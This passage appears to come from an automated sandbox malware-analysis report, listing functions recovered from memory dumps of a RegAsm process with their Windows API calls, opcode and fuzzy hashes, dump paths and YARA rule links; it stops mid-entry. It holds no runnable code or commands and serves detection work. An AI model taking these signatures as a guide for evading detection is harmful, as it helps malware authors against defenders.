Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4ef6f021cab1f017f5032a380d1a137fbbb647e602912aa803dfbb20acf7bebc
Instruction ID: 0ef0b95d37ae1e092b38b975e861485916941a8affa7898058fdcd35724a7c3a
Opcode Fuzzy Hash: 4ef6f021cab1f017f5032a380d1a137fbbb647e602912aa803dfbb20acf7bebc
Instruction Fuzzy Hash: 8621E2B5D00248DFDB10CFA9D985AEEBFF4FB48314F14841AE918A7250C378A944CFA5

Function 06E43F30 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E43F8D

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b708caf4bfa041c9962541b2d77204875978fd40c399251eef56fec656448e66
Instruction ID: b5f3e463ec48cc00258206ed15f3cc07d1950d9836039b84651efb0ff39d8b90
Opcode Fuzzy Hash: b708caf4bfa041c9962541b2d77204875978fd40c399251eef56fec656448e66
Instruction Fuzzy Hash: 551103B1900748CFCB20DFAAE545BDEBBF4EB49324F24845AE518A7210C378A544CFA5

Function 015AB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 015AB086

Memory Dump Source

Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 782f5470fc16a888efaef8df68b45891d62cfa59864520e8da8f6312479cba8d
Instruction ID: 5f2f6ecf811d738cd3dac9bed8a4d93a8d217eae91f1df50b194835c57c6fe29
Opcode Fuzzy Hash: 782f5470fc16a888efaef8df68b45891d62cfa59864520e8da8f6312479cba8d
Instruction Fuzzy Hash: 0211DFB6C007498FDB20DF9AC444A9EFFF4FB89624F14841AD529B7210C379A549CFA1

Function 06E437E4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E43F8D

Memory Dump Source

Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 4ac6c5255c3e7999268c992ed1c7528f1e4c83cade0dd69cbc3f7481abe43704
Instruction ID: 89c7bc282f54c909326aac73d574d813f71f8244c117105eadadbd82b46a14cf
Opcode Fuzzy Hash: 4ac6c5255c3e7999268c992ed1c7528f1e4c83cade0dd69cbc3f7481abe43704
Instruction Fuzzy Hash: 061145B18043488FCB20EFAAD448BDEFBF4EB48320F208419D518A3200C378A944CFA1

Function 06B83DE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

4']q, xrefs: 06B83F25

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 69e9c752e0048bab911a3071088f22361d99598b5323778ff0ce0d46d8cd8341
Instruction ID: df92b2782774232f35f6419b5c5f92d2861f3e3cf3754ee3f8a0e4e0cfca44e7
Opcode Fuzzy Hash: 69e9c752e0048bab911a3071088f22361d99598b5323778ff0ce0d46d8cd8341
Instruction Fuzzy Hash: 193147317053508FC75ABB38A8504AE7BEAEFCA61130544AAD44ACF356CE34DC0BC7A1

Function 06B884C8 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

4']q, xrefs: 06B885B1

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: c0511fa2887d1ff5c91f8710c75759c9889a74631891694bce3aafbccbbe535e
Instruction ID: 793990f4b4eb179a2cc6c5b2d26453590d33be7ac7c39bbfac93385be3b97ce6
Opcode Fuzzy Hash: c0511fa2887d1ff5c91f8710c75759c9889a74631891694bce3aafbccbbe535e
Instruction Fuzzy Hash: C231AB707012058FDB09BB79A8A45AE76E7EFC9210B10483DD51BCB394EE349E0687A2

Function 06B8B628 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

4']q, xrefs: 06B8B669

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: f31b6ee1c36c12666c32de32aaead36bede1fc4a3b87f0dd0f7a2c04d0206c77
Instruction ID: 71491f17937601098606df89a5f13d8700266c9c63a20f84593ac70ec866bf4b
Opcode Fuzzy Hash: f31b6ee1c36c12666c32de32aaead36bede1fc4a3b87f0dd0f7a2c04d0206c77
Instruction Fuzzy Hash: A4012474A06289BFCB06EF78E59559CBFB0FF45204B1400EDC88997291EB385E88CB12

Function 06B83EC8 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

4']q, xrefs: 06B83F25

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 474885695805f0783da54e128b7e02ceaa9f7c5f615c2cf269cb315d89f9c7e4
Instruction ID: 320eea9f1e338ec792f003bb4170538e88b0c32690a2a465db6a0ec4c056207c
Opcode Fuzzy Hash: 474885695805f0783da54e128b7e02ceaa9f7c5f615c2cf269cb315d89f9c7e4
Instruction Fuzzy Hash: 8DF090313402018FC659FB2DE85096E77DFEFC9650710492DD04A8B328EF74EC0A83A1

Function 06B8B638 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4']q, xrefs: 06B8B669

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: b9f734fd1a5af07b8a8efe1506316c71087207e24dfbc96c59136fde6ae3ff81
Instruction ID: edd789c1006297f3b2c9fc108041ca6f568fb9c1661f2fd5291a33133caa6c5e
Opcode Fuzzy Hash: b9f734fd1a5af07b8a8efe1506316c71087207e24dfbc96c59136fde6ae3ff81
Instruction Fuzzy Hash: 63F08C74A02209FFCB05EFB8E54999CBBB5FF84205B5041ADC80A972A4DB385E88DB45

Function 06B62078 Relevance: 1.0, Instructions: 1038COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b2887232eb9f4eee84e18ae5d0641aaeee5868c0646be76d5ca9a9df667690
Instruction ID: 45342fb4c1d8e0822de052d5bde336cc1a7acab79bd81c38c093d23a644b893a
Opcode Fuzzy Hash: 27b2887232eb9f4eee84e18ae5d0641aaeee5868c0646be76d5ca9a9df667690
Instruction Fuzzy Hash: F1928170B502189FDB54CB68CD50AEDBBB6EF88700F1080D9EA06AB3A1DB759E40DF51

Function 06B63838 Relevance: 1.0, Instructions: 1033COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3948f1903ff775dbc4f57e5378443d3529afadbb78969ac13d1c07c09c47a5b5
Instruction ID: f17ae049a9283696c16fa4d2b8ca75210a3ccc1f0f03e73f19d54501f321b80d
Opcode Fuzzy Hash: 3948f1903ff775dbc4f57e5378443d3529afadbb78969ac13d1c07c09c47a5b5
Instruction Fuzzy Hash: C6924A74B402149FCB44CF69C995E6ABBF6EF89704F118099E916EB3A1CB75EC40CB60

Function 06B61EBC Relevance: .7, Instructions: 731COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11e3aef7d38bf775a2cbe51ba7a23166d6ea1e1c420f14ae0dd11efaea7a9cca
Instruction ID: b490b3fe8690a5d14822ba9a05ee0ab667a2edda1d32484a3574f650aa63ff22
Opcode Fuzzy Hash: 11e3aef7d38bf775a2cbe51ba7a23166d6ea1e1c420f14ae0dd11efaea7a9cca
Instruction Fuzzy Hash: 0352A174B502148FDB54DB28C991EAE77B6EF88700F109099FE069B3A1CB76ED41CB91

Function 06B600D8 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a866e5d994a0ce66730a39583b48bdb4f90f961b632e387887087fc3b2018f9
Instruction ID: 337ee5afcc33e32f4aa9948de1e06b1c86075395d258e2fff25f52e0e268b4d9
Opcode Fuzzy Hash: 5a866e5d994a0ce66730a39583b48bdb4f90f961b632e387887087fc3b2018f9
Instruction Fuzzy Hash: 4242BB707406168FCB69EF79E540A2E7AB6FF85704B00199CD9039B394CF79EC098B96

Function 06B60598 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d1de9e650c93c42d599919c290021a5832a573684121b225767edeeed25b30
Instruction ID: a2d0b074c2cc8cfcb1a1783b8692dbfeea78c30adcb25dc95676b061b110a8e2
Opcode Fuzzy Hash: 46d1de9e650c93c42d599919c290021a5832a573684121b225767edeeed25b30
Instruction Fuzzy Hash: 9602AD707403158FCB599F6AD954A2E7BB6FF89704F005598EA028B3A1CF79EC05CB92

Function 06B60610 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bcb7432c2030378a5abfb546d518bbd0f2cd8536a9b1338eb2b72d0188108d1
Instruction ID: 2809846c47c87bfd727721986bf2e6f0e6846115b2f0336406a6035190e8fb6d
Opcode Fuzzy Hash: 1bcb7432c2030378a5abfb546d518bbd0f2cd8536a9b1338eb2b72d0188108d1
Instruction Fuzzy Hash: B802A1707403158FCB98DF6AD954A2A7BB6FF89704F005499EA029B3A1CF79EC05CB91

Function 06B60688 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faebaf63ddbaf235d7ccfccd0fb22f98f52c5ca7d7f64b702ab749be460176ff
Instruction ID: 19b60350991a0a27c690cd0e82a13986f47363c8456c1c8cf85bab406f96e5e7
Opcode Fuzzy Hash: faebaf63ddbaf235d7ccfccd0fb22f98f52c5ca7d7f64b702ab749be460176ff
Instruction Fuzzy Hash: 2CE1C470B003158FDB98DB66D954A397BB6FF89704F105499EA028B3A1CFB9EC05CB91

Function 06B60700 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6704ba5a3691aef800d7bd139cdd55a0d051db3efcebfa00a67d9fb3b6d0b7fc
Instruction ID: 97e81c292a381893f5a34a22a4e4470d5c7ec5a397c5c7fd3fccbba65bcd878c
Opcode Fuzzy Hash: 6704ba5a3691aef800d7bd139cdd55a0d051db3efcebfa00a67d9fb3b6d0b7fc
Instruction Fuzzy Hash: 8AD19270B103158FDB889B66C955B397BB6FF89704F109499EA028B3A1CFB9DC05CB91

Function 06B600B8 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbbe49f025a8799888526760bda7db5842a517bd4eb56814c4459257c0dc405a
Instruction ID: 039957fbc73c039305e7239fd86b8bd78d44afd1d2c50e59ac030f0493f7422a
Opcode Fuzzy Hash: fbbe49f025a8799888526760bda7db5842a517bd4eb56814c4459257c0dc405a
Instruction Fuzzy Hash: C5C18070B103059FDB889B66C955A797BB6FF89704F109095EA02CB3A1CBB9DC40CBA1

Function 06B87D58 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14302ad2fb67e5bddec33e0a571bd1a8709ae2d02fdd53e467195dc140e729ff
Instruction ID: 132edf5c8f893b41c72fb62d295c85c017211fc2357c72a1f37853bacd4b37a1
Opcode Fuzzy Hash: 14302ad2fb67e5bddec33e0a571bd1a8709ae2d02fdd53e467195dc140e729ff
Instruction Fuzzy Hash: 7E5134B1E10259CFDB54DFA9C880BDEBBB5FF88308F248469D419AB254DB749846CF90

Function 06B634D8 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 066765269c2692387618e80ed46eefaaa3a08418c399174ccd3b9a30b2133232
Instruction ID: 809ed682d2920c72e4f76d3814436444b582a7e4a593c68d999558492c4645f0
Opcode Fuzzy Hash: 066765269c2692387618e80ed46eefaaa3a08418c399174ccd3b9a30b2133232
Instruction Fuzzy Hash: 69514875B10519AFCB44CF69C98499EBBF2EF89310B1580A9FD15AB3A1DB30EC05CB50

Function 06B87D4C Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0de38b5ab414a225ad15a9fb1650060d64f00e616002ec020188d017fbae6ca
Instruction ID: 7e996e5aa03ce25ed6d2c633ea4a525d993c185ff948570dd0087904b25281dc
Opcode Fuzzy Hash: b0de38b5ab414a225ad15a9fb1650060d64f00e616002ec020188d017fbae6ca
Instruction Fuzzy Hash: 295132B0D10249DFDB60DFA9C880BDEBBB9FB48308F248529E419AB240DB749845CF91

Function 06B85579 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1b2f05c7058919e52e47376dee6f5bcde76b6d94ed71151dc5b31c867b07f8
Instruction ID: dec804dbf5e30a640a87f266b03013a079417fc735fd78f747be573d57170186
Opcode Fuzzy Hash: ed1b2f05c7058919e52e47376dee6f5bcde76b6d94ed71151dc5b31c867b07f8
Instruction Fuzzy Hash: 27318F75B012109FCB55EF38D84499EBBB6FF89301B0485A9E905CB366DB34DD06CBA0

Function 06B85588 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21de4f9243404be70a20a6314520d8c49a13dd24f7d60ffb18add06cbb48f5df
Instruction ID: 5133b2ac6726f50302d8b4804c3d296352feface33d2e3e4b4f7ac32c455b3c6
Opcode Fuzzy Hash: 21de4f9243404be70a20a6314520d8c49a13dd24f7d60ffb18add06cbb48f5df
Instruction Fuzzy Hash: 2D316F75B012109FCB55EF38D88495EBBB6FF89300B108469E905CB366DB35DD06CB90

Function 06B62EB4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c20dde209588037a4c8e581659e4d249cd5d4b8c69ae0dde6551310facf843
Instruction ID: e35493eb0ef8ec0f2af72a3cf1d92175624bef216e0e8e4d84bd2180e75744f9
Opcode Fuzzy Hash: f6c20dde209588037a4c8e581659e4d249cd5d4b8c69ae0dde6551310facf843
Instruction Fuzzy Hash: 17316E75E146199FCB45CFAAD8808DEFBB6FF89300B1580AAF814EB360D771A905CB51

Function 06B887A0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c845d877e5deb47f91df0eb02c2f99ad023ef169812b13185a382f01eb16bb
Instruction ID: 22ea55a686bee4e2a86be879c6afaf5ee382e0ebcdf02d34b988f4f273e292a0
Opcode Fuzzy Hash: 11c845d877e5deb47f91df0eb02c2f99ad023ef169812b13185a382f01eb16bb
Instruction Fuzzy Hash: 4D41EEB1D01248DFDB54DFAAD940ADEBBB6EF88310F14806AE419B7250DB34A945CF90

Function 06B88796 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fdfbd300240e0f7cfe1d0dca157e2531dff543fcc9d5d3ec15d9fa768918fda
Instruction ID: 387980a1abeecedbfa6e101b579fea4239faa762d10d8c0be3adc6bfb928490b
Opcode Fuzzy Hash: 7fdfbd300240e0f7cfe1d0dca157e2531dff543fcc9d5d3ec15d9fa768918fda
Instruction Fuzzy Hash: 1B3102B1D012489FDB14DFAAC940ADEBFB6EF88300F14802AE419AB250DB345945CFA1

Function 06B88A98 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fece19c9795c93887ebff2956e7f126152810d9ac018e8e4dabee0520cf62972
Instruction ID: 27929a40487218e4d2bcf8be3957e1cb8206832399e62d2137907cab957550c6
Opcode Fuzzy Hash: fece19c9795c93887ebff2956e7f126152810d9ac018e8e4dabee0520cf62972
Instruction Fuzzy Hash: B53124B1D01259DFDB54DFA9D890ADEBBF9FF88310F24846AE409B7240CB75A845CB90

Function 06B6105C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 946433f5a55e429b896a467727be87c72a99d0e329bc40f9cdae909f7e538d1f
Instruction ID: 5f70b54d88bc618b55ab755e2879f5b899aeee5a00ff3b12d93b025c864851dc
Opcode Fuzzy Hash: 946433f5a55e429b896a467727be87c72a99d0e329bc40f9cdae909f7e538d1f
Instruction Fuzzy Hash: 6921F770B001559FCB55CBAED9408AABBF7EFD9210B1495AAE815DB7A1CB34CC10C7A1

Function 0146D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2859561874.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_146d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975813b950e6e205bd86e363f0c898e4db68aa5c44b24d28bf488fc5b4f44199
Instruction ID: 7658b2e2990d5c6115b4da021af73b9d71c69db295c756a41e073d3c886d340c
Opcode Fuzzy Hash: 975813b950e6e205bd86e363f0c898e4db68aa5c44b24d28bf488fc5b4f44199
Instruction Fuzzy Hash: 5821F471A00240DFDB15DF58D9C0F27BF69FB8831CF24C56AD9490A626C336D456C6A2

Function 0146D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2859561874.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_146d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a212d777082a13cbf33d4e3d573436fee5477297bb4bc903d9d8cd19004f2bb
Instruction ID: 2f1341180828bd58cb3e75085099a348eeefc85e42e1238c55adecc2d570fe0c
Opcode Fuzzy Hash: 5a212d777082a13cbf33d4e3d573436fee5477297bb4bc903d9d8cd19004f2bb
Instruction Fuzzy Hash: F9212771A00244DFDB05CF54C9C0F56BF69FB98318F24C57AD9490B326C33AE846CAA2

Function 06B88C10 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff96ceb9e7c4fa33a2642e3c8f1fb5401d9bcfea244e69a2779bce74a9d7d522
Instruction ID: 969a43f6e4f67a7d823f6ad312e86e9ae7f122d397b36135e45cc6fce356b231
Opcode Fuzzy Hash: ff96ceb9e7c4fa33a2642e3c8f1fb5401d9bcfea244e69a2779bce74a9d7d522
Instruction Fuzzy Hash: E121C0F03112464FDB45DB28FC44AAB7BADEB84305B04566AE00487269EB799D08CBA0

Function 06B86E72 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83f466c81bb3291ccc114ae1a221596b4b53c352b5464f169778708e39d42b1f
Instruction ID: 4ad109ba118947cfc048dc08f2b14b647f0bbe29458a99570e8b3b8cbf125b0e
Opcode Fuzzy Hash: 83f466c81bb3291ccc114ae1a221596b4b53c352b5464f169778708e39d42b1f
Instruction Fuzzy Hash: BE11E3322092E42FC7535A696C208FB7FEEDE8A165309419BFA85C7153C428CE26D7B1

Function 0147D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2859632563.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_147d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa0214a1fba88d5fbc199eb3a2f9260c780fa4050291d17cd4595e68093ce219
Instruction ID: f30bd467b0f5bb7d0cdb6b55c0221a1fa9409c2629c8af27d59db5db715e8866
Opcode Fuzzy Hash: aa0214a1fba88d5fbc199eb3a2f9260c780fa4050291d17cd4595e68093ce219
Instruction Fuzzy Hash: 832125B1914280DFCB16DF68D980B56BF65EF84318F24C56ED9094B366C33AD407CA61

Function 06B88A8C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4dc3a574bcb95b744c8f8d6b04e03b90ea98d5cc6bac3cd24a5d611cc453aea
Instruction ID: 414fd89d5fd73eb42bfffd5a155c19febc0c51f9fe1b77865e406885a91d1cb5
Opcode Fuzzy Hash: a4dc3a574bcb95b744c8f8d6b04e03b90ea98d5cc6bac3cd24a5d611cc453aea
Instruction Fuzzy Hash: D02110B1D01249DFDB14DFA9C894BDEBFF9EF48300F64846AE409A7240DB75A845CBA0

Function 06B89158 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eefc4ac67683ad4b282aa54e570962400f9b35416644640620275dbb6d870d16
Instruction ID: 384ec3d28fc8d4de8908a956456730b2edfe00406a50544a028729b993d389c0
Opcode Fuzzy Hash: eefc4ac67683ad4b282aa54e570962400f9b35416644640620275dbb6d870d16
Instruction Fuzzy Hash: D121F3B4D08259DFCF54EFA8D488AFEBBB4EB09315F1055AAE425A7391D7305A81CF80

Function 0147D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2859632563.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_147d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3860e3c7d327f1d261d8315fa396f4058080c2d748b4a1c369ab52ce5416ebbd
Instruction ID: e183f3593dee773e000e1867d974a42c0e3bf32a3e7ab00736d9d5aa4e90db8d
Opcode Fuzzy Hash: 3860e3c7d327f1d261d8315fa396f4058080c2d748b4a1c369ab52ce5416ebbd
Instruction Fuzzy Hash: 06217F755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B667C33A984ACB62

Function 06B88E70 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74c15c20d2420aec3d00e3a53bdba8bdac887d72aca8363ec9bf2da0e2d88d0
Instruction ID: a46322d129500ba6b15f474dbf4759c9434993358f15779802630e0e92ef1918
Opcode Fuzzy Hash: d74c15c20d2420aec3d00e3a53bdba8bdac887d72aca8363ec9bf2da0e2d88d0
